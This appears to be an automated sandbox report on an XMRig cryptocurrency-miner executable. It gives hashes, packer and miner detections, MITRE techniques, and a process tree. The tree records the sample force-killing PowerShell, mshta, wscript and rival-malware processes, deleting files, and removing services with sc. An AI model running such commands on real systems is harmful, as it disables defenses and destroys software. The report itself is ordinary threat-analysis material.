xmrig | baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d

General

Target

baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe
Size

388KB
MD5

008529c86478f502614a904b6d582c19
SHA1

cfad60e56ec78bd7acb557bc4486e9f4ab0b8c79
SHA256

baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d
SHA512

eb4e697fb4d443b23f21613a68589482e700f60402988afa8ad08416bf81e76684b699e6549355f43e80b28e47b2d862c5be84570d9b4f896f4f316d038b135c
SSDEEP

6144:CxcIv8sDu4A+Oqp5UW9GtetZ5wZOTbNSubJyg+oiw4BHbz1qfOvlAkmQRFW:CxN5Duqzj9GsZGMn1yg+PwCHnVmQRFW

Score

10^/10

xmrig evasion miner upx

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 2 IoCs

miner

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\sqlageatc.exe	xmrig
C:\Users\Admin\AppData\Local\Temp\sqlageatc.exe	xmrig

Downloads MZ/PE file
Executes dropped EXE 1 IoCs

Processes:

sqlageatc.exe

pid process

1432 sqlageatc.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

pid	process
1432	sqlageatc.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/552-133-0x0000000002390000-0x000000000239B000-memory.dmp	upx
behavioral1/memory/552-134-0x0000000002390000-0x000000000239B000-memory.dmp	upx

Launches sc.exe 30 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	process
3304	sc.exe
1692	sc.exe
1100	sc.exe
3000	sc.exe
2104	sc.exe
4556	sc.exe
1480	sc.exe
2780	sc.exe
3604	sc.exe
3520	sc.exe
3532	sc.exe
2424	sc.exe
4360	sc.exe
3476	sc.exe
2860	sc.exe
1980	sc.exe
2756	sc.exe
340	sc.exe
1816	sc.exe
4708	sc.exe
4228	sc.exe
5056	sc.exe
2540	sc.exe
4516	sc.exe
2000	sc.exe
4824	sc.exe
796	sc.exe
308	sc.exe
4676	sc.exe
1100	sc.exe

Kills process with taskkill 64 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
4360	taskkill.exe
3616	taskkill.exe
4052	taskkill.exe
4244	taskkill.exe
1980	taskkill.exe
3256	taskkill.exe
3912	taskkill.exe
2284	taskkill.exe
3592	taskkill.exe
1344	taskkill.exe
4672	taskkill.exe
3596	taskkill.exe
2324	taskkill.exe
1144	taskkill.exe
3444	taskkill.exe
4100	taskkill.exe
1816	taskkill.exe
3188	taskkill.exe
3476	taskkill.exe
3664	taskkill.exe
364	taskkill.exe
1244	taskkill.exe
4284	taskkill.exe
4356	taskkill.exe
3912	taskkill.exe
4260	taskkill.exe
3824	taskkill.exe
1816	taskkill.exe
2016	taskkill.exe
2176	taskkill.exe
3140	taskkill.exe
4944	taskkill.exe
4912	taskkill.exe
1980	taskkill.exe
3404	taskkill.exe
3476	taskkill.exe
4360	taskkill.exe
3220	taskkill.exe
3000	taskkill.exe
952	taskkill.exe
3820	taskkill.exe
1820	taskkill.exe
2916	taskkill.exe
4108	taskkill.exe
1708	taskkill.exe
3032	taskkill.exe
4260	taskkill.exe
1752	taskkill.exe
3296	taskkill.exe
4392	taskkill.exe
4832	taskkill.exe
1252	taskkill.exe
1712	taskkill.exe
3904	taskkill.exe
2208	taskkill.exe
2108	taskkill.exe
2208	taskkill.exe
3120	taskkill.exe
1424	taskkill.exe
1716	taskkill.exe
4052	taskkill.exe
4412	taskkill.exe
480	taskkill.exe
968	taskkill.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe

pid	process
552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe
552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe
552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe
552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe
552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe
552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe
552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe
552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe
552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe
552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe
552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe
552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe
552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe
552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe
552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe
552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe
552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe
552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe
552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe
552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe
552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe
552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe
552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe
552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe
552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe
552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe
552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe
552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe
552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe
552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe
552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe
552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe
552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe
552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe
552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe
552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe
552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe
552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe
552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe
552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe
552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe
552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe
552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe
552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe
552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe
552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe
552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe
552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe
552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe
552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe
552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe
552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe
552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe
552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe
552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe
552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe
552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe
552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe
552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe
552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe
552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe
552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe
552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe
552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

668

pid	process
668

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.execmd.exetaskkill.exetaskkill.exetaskkill.exeConhost.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exeConhost.exetaskkill.execmd.exetaskkill.exetaskkill.execmd.exetaskkill.exetaskkill.exetaskkill.execmd.execmd.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

description	pid	process
Token: SeDebugPrivilege	3592	taskkill.exe
Token: SeDebugPrivilege	2108	taskkill.exe
Token: SeDebugPrivilege	1564	taskkill.exe
Token: SeDebugPrivilege	3628	taskkill.exe
Token: SeDebugPrivilege	3000	taskkill.exe
Token: SeDebugPrivilege	3264	taskkill.exe
Token: SeDebugPrivilege	3336	taskkill.exe
Token: SeDebugPrivilege	4244	taskkill.exe
Token: SeDebugPrivilege	4260	taskkill.exe
Token: SeDebugPrivilege	4832	taskkill.exe
Token: SeDebugPrivilege	2208	taskkill.exe
Token: SeDebugPrivilege	3552	taskkill.exe
Token: SeDebugPrivilege	3068	taskkill.exe
Token: SeDebugPrivilege	3404	taskkill.exe
Token: SeDebugPrivilege	3824	taskkill.exe
Token: SeDebugPrivilege	1472	taskkill.exe
Token: SeDebugPrivilege	1252	taskkill.exe
Token: SeDebugPrivilege	1424	taskkill.exe
Token: SeDebugPrivilege	3404	taskkill.exe
Token: SeDebugPrivilege	1716	taskkill.exe
Token: SeDebugPrivilege	1980	taskkill.exe
Token: SeDebugPrivilege	1816	taskkill.exe
Token: SeDebugPrivilege	3796	taskkill.exe
Token: SeDebugPrivilege	4864	taskkill.exe
Token: SeDebugPrivilege	2664	taskkill.exe
Token: SeDebugPrivilege	1708	taskkill.exe
Token: SeDebugPrivilege	3588	taskkill.exe
Token: SeDebugPrivilege	2636	taskkill.exe
Token: SeDebugPrivilege	2760	taskkill.exe
Token: SeDebugPrivilege	4912	taskkill.exe
Token: SeDebugPrivilege	3256	taskkill.exe
Token: SeDebugPrivilege	968
Token: SeDebugPrivilege	3140	cmd.exe
Token: SeDebugPrivilege	3656	taskkill.exe
Token: SeDebugPrivilege	2324	taskkill.exe
Token: SeDebugPrivilege	952	taskkill.exe
Token: SeDebugPrivilege	3484	Conhost.exe
Token: SeDebugPrivilege	3704	taskkill.exe
Token: SeDebugPrivilege	4660	taskkill.exe
Token: SeDebugPrivilege	4472	taskkill.exe
Token: SeDebugPrivilege	3912	taskkill.exe
Token: SeDebugPrivilege	796	taskkill.exe
Token: SeDebugPrivilege	3640	taskkill.exe
Token: SeDebugPrivilege	3584	taskkill.exe
Token: SeDebugPrivilege	3032	taskkill.exe
Token: SeDebugPrivilege	1816	taskkill.exe
Token: SeDebugPrivilege	4360	Conhost.exe
Token: SeDebugPrivilege	2284	taskkill.exe
Token: SeDebugPrivilege	3140	cmd.exe
Token: SeDebugPrivilege	4808	taskkill.exe
Token: SeDebugPrivilege	1480	taskkill.exe
Token: SeDebugPrivilege	3120	cmd.exe
Token: SeDebugPrivilege	1712	taskkill.exe
Token: SeDebugPrivilege	4260	taskkill.exe
Token: SeDebugPrivilege	3700	taskkill.exe
Token: SeDebugPrivilege	3616	cmd.exe
Token: SeDebugPrivilege	1652	cmd.exe
Token: SeDebugPrivilege	3476	taskkill.exe
Token: SeDebugPrivilege	4916	taskkill.exe
Token: SeDebugPrivilege	2016	taskkill.exe
Token: SeDebugPrivilege	1344	taskkill.exe
Token: SeDebugPrivilege	3904	taskkill.exe
Token: SeDebugPrivilege	2208	taskkill.exe
Token: SeDebugPrivilege	2632	taskkill.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

sqlageatc.exe

pid process

1432 sqlageatc.exe

pid	process
1432	sqlageatc.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe

pid	process
552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe
552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 552 wrote to memory of 4332	552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe	cmd.exe
PID 552 wrote to memory of 4332	552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe	cmd.exe
PID 552 wrote to memory of 4332	552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe	cmd.exe
PID 4332 wrote to memory of 3592	4332	cmd.exe	taskkill.exe
PID 4332 wrote to memory of 3592	4332	cmd.exe	taskkill.exe
PID 4332 wrote to memory of 3592	4332	cmd.exe	taskkill.exe
PID 552 wrote to memory of 1100	552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe	cmd.exe
PID 552 wrote to memory of 1100	552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe	cmd.exe
PID 552 wrote to memory of 1100	552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe	cmd.exe
PID 1100 wrote to memory of 2108	1100	cmd.exe	taskkill.exe
PID 1100 wrote to memory of 2108	1100	cmd.exe	taskkill.exe
PID 1100 wrote to memory of 2108	1100	cmd.exe	taskkill.exe
PID 552 wrote to memory of 4140	552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe	cmd.exe
PID 552 wrote to memory of 4140	552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe	cmd.exe
PID 552 wrote to memory of 4140	552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe	cmd.exe
PID 4140 wrote to memory of 1564	4140	cmd.exe	taskkill.exe
PID 4140 wrote to memory of 1564	4140	cmd.exe	taskkill.exe
PID 4140 wrote to memory of 1564	4140	cmd.exe	taskkill.exe
PID 552 wrote to memory of 3496	552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe	cmd.exe
PID 552 wrote to memory of 3496	552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe	cmd.exe
PID 552 wrote to memory of 3496	552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe	cmd.exe
PID 552 wrote to memory of 308	552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe	cmd.exe
PID 552 wrote to memory of 308	552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe	cmd.exe
PID 552 wrote to memory of 308	552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe	cmd.exe
PID 552 wrote to memory of 112	552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe	cmd.exe
PID 552 wrote to memory of 112	552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe	cmd.exe
PID 552 wrote to memory of 112	552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe	cmd.exe
PID 552 wrote to memory of 3552	552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe	cmd.exe
PID 552 wrote to memory of 3552	552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe	cmd.exe
PID 552 wrote to memory of 3552	552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe	cmd.exe
PID 552 wrote to memory of 3116	552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe	cmd.exe
PID 552 wrote to memory of 3116	552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe	cmd.exe
PID 552 wrote to memory of 3116	552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe	cmd.exe
PID 3116 wrote to memory of 3628	3116	cmd.exe	taskkill.exe
PID 3116 wrote to memory of 3628	3116	cmd.exe	taskkill.exe
PID 3116 wrote to memory of 3628	3116	cmd.exe	taskkill.exe
PID 552 wrote to memory of 1856	552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe	cmd.exe
PID 552 wrote to memory of 1856	552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe	cmd.exe
PID 552 wrote to memory of 1856	552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe	cmd.exe
PID 552 wrote to memory of 4860	552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe	cmd.exe
PID 552 wrote to memory of 4860	552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe	cmd.exe
PID 552 wrote to memory of 4860	552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe	cmd.exe
PID 552 wrote to memory of 528	552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe	cmd.exe
PID 552 wrote to memory of 528	552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe	cmd.exe
PID 552 wrote to memory of 528	552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe	cmd.exe
PID 552 wrote to memory of 5020	552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe	cmd.exe
PID 552 wrote to memory of 5020	552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe	cmd.exe
PID 552 wrote to memory of 5020	552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe	cmd.exe
PID 552 wrote to memory of 2368	552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe	cmd.exe
PID 552 wrote to memory of 2368	552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe	cmd.exe
PID 552 wrote to memory of 2368	552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe	cmd.exe
PID 2368 wrote to memory of 3000	2368	cmd.exe	taskkill.exe
PID 2368 wrote to memory of 3000	2368	cmd.exe	taskkill.exe
PID 2368 wrote to memory of 3000	2368	cmd.exe	taskkill.exe
PID 552 wrote to memory of 3636	552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe	cmd.exe
PID 552 wrote to memory of 3636	552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe	cmd.exe
PID 552 wrote to memory of 3636	552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe	cmd.exe
PID 3636 wrote to memory of 3264	3636	cmd.exe	taskkill.exe
PID 3636 wrote to memory of 3264	3636	cmd.exe	taskkill.exe
PID 3636 wrote to memory of 3264	3636	cmd.exe	taskkill.exe
PID 552 wrote to memory of 1636	552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe	cmd.exe
PID 552 wrote to memory of 1636	552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe	cmd.exe
PID 552 wrote to memory of 1636	552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe	cmd.exe
PID 552 wrote to memory of 2336	552	baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe
"C:\Users\Admin\AppData\Local\Temp\baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:552

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im wscript.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:4332

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im wscript.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3592

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im SQLAGENTSWD.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:1100

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im SQLAGENTSWD.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2108

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im exp1orer.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:4140

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im exp1orer.exe
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1564

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\ProgramData\exp1orer.exe
2⤵
PID:3496

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Users\exp1orer.exe
2⤵
PID:308

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\RECYCLER\exp1orer.exe
2⤵
PID:112

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:/RECYCLER/exp1orer.exe
2⤵
PID:3552

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im expl0rer.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:3116

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im expl0rer.exe
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3628

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\ProgramData\expl0rer.exe
2⤵
PID:1856

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Users\expl0rer.exe
2⤵
PID:4860

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:/RECYCLER/expl0rer.exe
2⤵
PID:5020

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\RECYCLER\expl0rer.exe
2⤵
PID:528

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im mshta.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:2368

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im mshta.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3000

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im powershell.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:3636

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im powershell.exe
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3264

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im powershell.exe
2⤵
PID:1636

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im powershell.exe
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3336

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im WmiPrvSER.exe
2⤵
PID:2336

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im WmiPrvSER.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4244

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q %systemroot%\Help\WmiPrvSER.exe
2⤵
PID:4044

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Windows\Help\WmiPrvSER.exe
2⤵
PID:2532

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im Netsh_Help.dll
2⤵
PID:952

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Netsh_Help.dll
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4260

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q %systemroot%\SysWOW64\Netsh_Help.dll
2⤵
PID:4700

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Windows\SysWOW64\Netsh_Help.dll
2⤵
PID:3428

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im CGlobalan.exe
2⤵
PID:3936

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CGlobalan.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4832

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q %systemroot%\SystemCvlsa\CGlobalan.exe
2⤵
PID:5040

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Windows\SystemCvlsa\CGlobalan.exe
2⤵
PID:1432

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im CGlobalan.exe
2⤵
PID:2636

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CGlobalan.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2208

C:\Windows\SysWOW64\cmd.exe
cmd /c sc delete "CVIDIA AlibabaProtect ClobalSign"
2⤵
PID:1712

C:\Windows\SysWOW64\sc.exe
sc delete "CVIDIA AlibabaProtect ClobalSign"
3⤵
- Launches sc.exe
PID:3532

C:\Windows\SysWOW64\cmd.exe
cmd /c sc delete "CVIDIA AlibabaProtect ClobalSign"
2⤵
PID:1656

C:\Windows\SysWOW64\sc.exe
sc delete "CVIDIA AlibabaProtect ClobalSign"
3⤵
- Launches sc.exe
PID:4228

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im Gsmarn64.exe
2⤵
PID:872

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Gsmarn64.exe
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3552

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im Gsmarn32.exe
2⤵
PID:3220

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Gsmarn32.exe
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3068

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q %ProgramFiles%\Microsoft BnibabsProt\Gsmarn64.exe
2⤵
PID:3376

